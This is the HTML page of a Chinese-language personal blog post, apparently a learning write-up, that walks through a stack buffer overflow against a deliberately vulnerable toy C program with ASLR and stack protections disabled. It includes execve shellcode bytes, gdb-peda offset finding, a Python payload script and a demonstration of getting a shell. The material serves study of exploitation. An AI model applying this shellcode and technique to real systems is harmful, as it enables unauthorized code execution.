<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <!--[if lte IE 9]><meta http-equiv="refresh" content="0;url=/ie.html"><![endif]--> <meta name="author" content="void0red"> <link href='http://fonts.googleapis.com/css?family=Open+Sans:400,400italic,600|Droid+Sans+Mono' rel='stylesheet' type='text/css'> <link rel="shortcut icon" href="/assets/img/favicon.png" /> <link rel="stylesheet" href="/css/main.css"> <link rel="canonical" href="http://localhost:4000/2017/11/09/overflow.html"> <!-- Begin Jekyll SEO tag v2.3.0 --> <title>overflow | void0red’s blog</title> <meta property="og:title" content="overflow" /> <meta name="author" content="void0red" /> <meta property="og:locale" content="en_US" /> <meta name="description" content="this is a test, not true" /> <meta property="og:description" content="this is a test, not true" /> <link rel="canonical" href="http://localhost:4000/2017/11/09/overflow.html" /> <meta property="og:url" content="http://localhost:4000/2017/11/09/overflow.html" /> <meta property="og:site_name" content="void0red’s blog" /> <meta property="og:type" content="article" /> <meta property="article:published_time" content="2017-11-09T00:00:00+08:00" /> <script type="application/ld+json"> {"name":null,"description":"this is a test, not true","author":{"@type":"Person","name":"void0red"},"@type":"BlogPosting","url":"http://localhost:4000/2017/11/09/overflow.html","publisher":null,"image":null,"headline":"overflow","dateModified":"2017-11-09T00:00:00+08:00","datePublished":"2017-11-09T00:00:00+08:00","sameAs":null,"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2017/11/09/overflow.html"},"@context":"http://schema.org"}</script> <!-- End Jekyll SEO tag --> <link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="" /> <script src="/assets/js/prefixfree.js"></script> </head> <body> <script type="text/javascript" color="0,255,128" opacity='1' src="/assets/js/canvas-nest.min.js"></script> <aside id="sidebar" class="open"> <div id="sidebar-left"> <a id="sidebar-avatar" href="/"> <img id="sidebar-avatar-img" alt="" src="/assets/img/avatar.jpg"/> </a> <div id="sidebar-social"> <a href="/pages/feed.xml" class="sidebar-social-icon feed"></a> <a href="mailto:void0red@gmail.com" class="sidebar-social-icon email"></a> <!-- Generate icon by yourself https://icomoon.io/app/#/select --> <a href="https://github.com/void0red" class="sidebar-social-icon github" target="_blank"></a> </div> <ul id="sidebar-tags"> <li class="sidebar-tag active" data-filter="recent">最新文章</li> <li class="sidebar-tag" data-filter="others">others</li> <li class="sidebar-tag" data-filter="c">c</li> <li class="sidebar-tag" data-filter="bin">bin</li> <li class="sidebar-tag" data-filter="pwn">pwn</li> </ul> <div> <object type="application/x-shockwave-flash" style="outline:none;" data="/pic/hamster.swf" width="120" height="90"><param name="movie" value="http://cdn.abowman.com/widgets/hamster/hamster.swf?"></param><param name="AllowScriptAccess" value="always"></param><param name="wmode" value="opaque"></param></object> </div> </div> <div id="sidebar-right"> <div id="search-box"> <input id="search-input" type="text" placeholder="Search" /> </div> <nav id="toc"> <a class="toc-link" data-tags="pwn" href="/2017/11/11/ret2libc.html"> ret2libc </a> <a class="toc-link" data-tags="pwn" href="/2017/11/09/overflow.html"> overflow </a> <a class="toc-link" data-tags="others" href="/2017/11/05/a-letter.html"> a letter </a> <a class="toc-link" data-tags="bin" href="/2017/10/21/try_assembly_0.html"> try_assembly_0 </a> <a class="toc-link" data-tags="others" href="/2017/10/13/Crawler.html"> Crawler Sharing </a> <a class="toc-link" data-tags="c" href="/2017/10/07/struct.html"> About learning c struct </a> <a class="toc-link" data-tags="c" href="/2017/10/07/linked_list.html"> About learning linked_list </a> <a class="toc-link" data-tags="others" href="/2017/09/24/mysql.html"> About learning MYSQL </a> </nav> </div> </aside> <main id="main" class="open"> <article class="post container"> <div class="post-meta"> <span class="post-meta-span date">2017 November 09</span> <span class="post-meta-span tag">pwn</span> </div> <h1 class="post-title">overflow</h1> <blockquote> <p>this is a test, not true</p> </blockquote> <h2 id="0x00准备">0x00准备</h2> <ul> <li> <p>本次实验的机器为<code class="highlighter-rouge">Ubuntu 16.04.2 LTS</code>64位系统</p> </li> <li> <p>需要关闭ASLR，<code class="highlighter-rouge">echo 0 &gt; /proc/sys/kernel/randomize_va_space</code>，如果提示权限不够，可能需要用<code class="highlighter-rouge">su</code>提升权限</p> </li> <li> <p>用<code class="highlighter-rouge">gcc</code>编译需要关闭<code class="highlighter-rouge">stack-protector</code>，允许栈的执行权限<code class="highlighter-rouge">execstack</code></p> </li> <li> <p>需要<code class="highlighter-rouge">gdb</code> <code class="highlighter-rouge">peda</code> <code class="highlighter-rouge">python2</code></p> </li> <li> <p>需要一串<code class="highlighter-rouge">shellcode</code>，本次使用</p> <p><code class="highlighter-rouge">\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05</code></p> </li> <li> <p>一段计算地址的c语言程序<code class="highlighter-rouge">getenvaddr</code>，源码在github可以找到，也可以选择下面的编译</p> <div class="language-c highlighter-rouge"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
</span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"Usage: %s &lt;environment var&gt; &lt;target program name&gt;</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
		<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">ptr</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="cm">/* Get environment variable location */</span>
		<span class="n">ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">-</span> <span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]))</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span> <span class="cm">/* Adjust for program name */</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"%s will be at %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">ptr</span><span class="p">);</span>
	<span class="p">}</span>
  	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div> </li> <li> <p>攻击目标<code class="highlighter-rouge">test.c</code>，自己写的很简单</p> <div class="language-c highlighter-rouge"><pre class="highlight"><code><span class="cp">#include&lt;stdio.h&gt;
#include&lt;unistd.h&gt;
</span><span class="kt">int</span> <span class="n">main</span><span class="p">(){</span>
	<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">10</span><span class="p">];</span>
	<span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="n">buf</span><span class="p">,</span><span class="mi">40</span><span class="p">);</span>
	<span class="n">puts</span><span class="p">(</span><span class="s">"23333</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div> </li> </ul> <h2 id="0x01分析">0x01分析</h2> <p>通过观察很容易发现程序存在溢出漏洞，字符数组buf只申请了10个字节（10×1）的空间，而read函数却读入了40个字节。使用<code class="highlighter-rouge">gcc -g -fno-stack-protector -z execstack -o test test.c</code>编译源文件，用<code class="highlighter-rouge">gdb</code>调试程序</p> <p>查看main函数处的汇编代码：</p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400566 &lt;+0&gt;:	push   rbp				;rbp入栈，保存堆栈帧
   0x0000000000400567 &lt;+1&gt;:	mov    rbp,rsp				;rsp存到rbp中，确定了新的堆栈帧
   0x000000000040056a &lt;+4&gt;:	sub    rsp,0x10				;rsp减16，栈顶变动，为buf开辟了栈空间
   0x000000000040056e &lt;+8&gt;:	lea    rax,[rbp-0x10]			;将栈顶的地址存到rax中
   0x0000000000400572 &lt;+12&gt;:	mov    edx,0x28				;将40存到edx中
   0x0000000000400577 &lt;+17&gt;:	mov    rsi,rax				;传递栈顶地址，rsi存储buf的开始地址
   0x000000000040057a &lt;+20&gt;:	mov    edi,0x0				;将0存到edi中
   0x000000000040057f &lt;+25&gt;:	call   0x400440 &lt;read@plt&gt;		;调用read函数
   0x0000000000400584 &lt;+30&gt;:	mov    edi,0x400624			
   0x0000000000400589 &lt;+35&gt;:	call   0x400430 &lt;puts@plt&gt;
   0x000000000040058e &lt;+40&gt;:	mov    eax,0x0
   0x0000000000400593 &lt;+45&gt;:	leave  
   0x0000000000400594 &lt;+46&gt;:	ret    
End of assembler dump.
</code></pre></div> <p>程序执行到调用read函数，<code class="highlighter-rouge">call</code>指令会将下条指令的地址入栈，也就是<code class="highlighter-rouge">0x400584</code>，作为返回地址，然后将程序控制权交给read函数。</p> <p>下面这张图是一般函数栈的构造：</p> <p><img src="https://raw.githubusercontent.com/void0red/Pictures/master/blog/overflow_0.png" alt="" /></p> <p>这里栈内大概是这个样子：</p> <div class="highlighter-rouge"><pre class="highlight"><code>rbp					&lt;- 高地址
[]		;空处4字节
buf[9]-buf[8]	;空出2字节
buf[7]-buf[4]
buf[3]-buf[0]
0x400584				&lt;- 低地址
</code></pre></div> <p>然后read函数读入数据，程序给buf变量实际分配了16字节，为了寻址的方便还有一部分作为保留，一定程度上避免了溢出的发生。</p> <p>尝试输入32字节的数据<code class="highlighter-rouge">0123456地址789abcdef0123456789abcdef</code></p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ run
0123456789abcdef0123456789abcdef
23333

Program received signal SIGSEGV, Segmentation fault.
</code></pre></div> <p>程序发生了溢出，并且停在了<code class="highlighter-rouge">ret</code>指令处，很容易发现<code class="highlighter-rouge">rsp</code>，<code class="highlighter-rouge">rbp</code>处的值似乎都被输入覆盖了。</p> <p>所以read读取完发生了什么？此时栈相当于：</p> <div class="highlighter-rouge"><pre class="highlight"><code>0x400584				;返回地址  	 &lt;- 高地址
rbp（main）
...					&lt;-rbp
...
{buf
...
...}					&lt;-rsp		&lt;- 低地址
</code></pre></div> <p>函数需要返回，有一条<code class="highlighter-rouge">leave</code>指令，将<code class="highlighter-rouge">rbp</code>拷贝到<code class="highlighter-rouge">rsp</code>中，相当于清除了为局部变量分配的空间，此时栈相当于：</p> <div class="highlighter-rouge"><pre class="highlight"><code>0x400584				;返回地址  	  &lt;- 高地址
rbp（main）
					&lt;-rbp,rsp	 &lt;- 低地址
</code></pre></div> <p><code class="highlighter-rouge">leave</code>指令还有一个作用是弹栈，即将栈顶的数据弹出到<code class="highlighter-rouge">ebp</code>中，也就恢复了main函数的堆栈帧，此时栈相当于：</p> <div class="highlighter-rouge"><pre class="highlight"><code>0x400584				;返回地址  	  &lt;- 高地址
					&lt;-rsp		 &lt;- 低地址
</code></pre></div> <p>接下来，有一条<code class="highlighter-rouge">ret</code>指令，弹栈，即将栈顶的数据弹出到<code class="highlighter-rouge">rip</code>中，因为<code class="highlighter-rouge">rip</code>存储的是当前指令的地址，也就是将返回地址存入了下一个指令的地址，达到了控制权从read函数到main函数的目的。</p> <p>这时，思路就很清晰了，只需要合适的数据将返回地址覆盖，程序就会跳转到合适的地方。</p> <p><img src="https://raw.githubusercontent.com/void0red/Pictures/master/blog/overflow_1.png" alt="" /></p> <h2 id="0x02确定返回地址的偏移量">0x02确定返回地址的偏移量</h2> <p>首先，我们需要确定输入到达返回地址所需字节数。</p> <p>可以使用<code class="highlighter-rouge">peda</code>的<code class="highlighter-rouge">pattern_creat</code>创造一个40字节的字符串：</p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ pattern_create 40 a.txt
Writing pattern of 40 chars to filename "a.txt"
</code></pre></div> <p>将字符串传入并执行</p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ r &lt; a.txt 
Starting program: /home/void0red/Documents/pwn/test &lt; a.txt
23333

Program received signal SIGSEGV, Segmentation fault.
[-------------------------------------code-------------------------------------]
   0x400589 &lt;main+35&gt;:	call   0x400430 &lt;puts@plt&gt;
   0x40058e &lt;main+40&gt;:	mov    eax,0x0
   0x400593 &lt;main+45&gt;:	leave  
=&gt; 0x400594 &lt;main+46&gt;:	ret    
   0x400595:	nop    WORD PTR cs:[rax+rax*1+0x0]
   0x40059f:	nop
   0x4005a0 &lt;__libc_csu_init&gt;:	push   r15
   0x4005a2 &lt;__libc_csu_init+2&gt;:	push   r14
</code></pre></div> <p>程序停在了<code class="highlighter-rouge">ret</code>指令的地方，因为覆盖返回地址的是一串无意义的值，无法进行跳转，上一步操作将<code class="highlighter-rouge">rbp</code>（寄存器）的值拷贝到<code class="highlighter-rouge">rsp</code>（寄存器）中，导致<code class="highlighter-rouge">rsp</code>指向了存储返回地址的栈空间，通过查看<code class="highlighter-rouge">rsp</code>指向的栈的数据，可以算出返回地址在栈中，相距未读入数据时栈顶的偏移量。</p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ x/wx $rsp
0x7fffffffdd08:	0x44414128
</code></pre></div> <p>可以看出原本存放返回地址的的栈上现在存放的是<code class="highlighter-rouge">0x44414128</code></p> <p>用<code class="highlighter-rouge">pattern_offest</code>计算偏移量</p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ pattern_offset 0x44414128
1145127208 found at offset: 24
</code></pre></div> <p>OK，偏移量为24，也就是说输入值的前24个字节是任意的（注意不要存在<code class="highlighter-rouge">\x00</code>之类的字节，可能会导致读入终止），接在后面存入8个字节的地址，就能够实现跳转。</p> <h2 id="0x03确定shellcode的地址">0x03确定shellcode的地址</h2> <p>因为选择的<code class="highlighter-rouge">shellcode地址</code>为27字节，前面的填充数据要用24字节，合起来超过40字节，无法写入，不如将包含<code class="highlighter-rouge">shellcode</code>的指令放入系统环境，用于测试</p> <div class="highlighter-rouge"><pre class="highlight"><code>export PWN=`python -c 'print"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`
</code></pre></div> <p>用<code class="highlighter-rouge">getenvaddr</code>来确定<code class="highlighter-rouge">PWN</code>变量对<code class="highlighter-rouge">test</code>输入的地址</p> <div class="highlighter-rouge"><pre class="highlight"><code>$ export PWN=`python -c 'print"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`
$ ./getenvaddr PWN ./test
PWN will be at 0x7fffffffed03
</code></pre></div> <p>得到地址<code class="highlighter-rouge">0x7fffffffed03</code></p> <h2 id="0x04编写payload">0x04编写Payload</h2> <p>用python的struct模块写payload的话很方便</p> <div class="language-python highlighter-rouge"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s">'A'</span> <span class="o">*</span> <span class="mi">24</span> <span class="o">+</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;Q'</span><span class="p">,</span><span class="mh">0x7fffffffed03</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'a.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div> <p><code class="highlighter-rouge">pack</code>函数用来处理数据很方便：）</p> <p><code class="highlighter-rouge">pack(format,var0,var1...)</code>按照给定的格式(format)，把后面数据封装成字符串，<code class="highlighter-rouge">&lt;</code>是按照小端序，<code class="highlighter-rouge">Q</code>是无符号的八字节整数</p> <h2 id="0x05测试">0x05测试</h2> <p>通过管道的方式输入文件的数据</p> <div class="highlighter-rouge"><pre class="highlight"><code>$ (cat a.txt;cat)|./test 
23333

whoami
void0red
</code></pre></div> <p>经过测试，确实的得到了shell</p> <h2 id="0x06总结">0x06总结</h2> <p>主要是搞清楚函数调用与返回时栈的变化，测试过程中关闭了防护措施</p> <ul> <li>ASLR</li> <li>stack-protector</li> <li>execstack</li> </ul> </article> <div class="footer"> <div class="container"> <p class="footer-entry">All content is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA</a></p> <p class="footer-entry">Buit with <a href="http://jekyllrb.com/" target="_blank">Jekyll</a> and <a href="https://github.com/P233/3-Jekyll" target="_blank">3-Jekyll theme</a> • Hosted on <a href="https://pages.github.com/" target="_blank">Github</a></p> </div> </div> </main> <button id="menu" class="open"> <span id="menu-icons"></span> </button> <button id="post-toc-menu"> <span id="post-toc-menu-icons"></span> </button> <div id="post-toc"> <span id="post-toc-title">Table of Contents</span> <ul id="post-toc-ul"></ul> </div> <script src="/assets/js/jquery-2.1.3.min.js"></script> <script src="/assets/js/jquery.pjax.js"></script> <script src="/assets/js/nprogress.js"></script> <script src="/assets/js/main.js"></script> </body> </html>
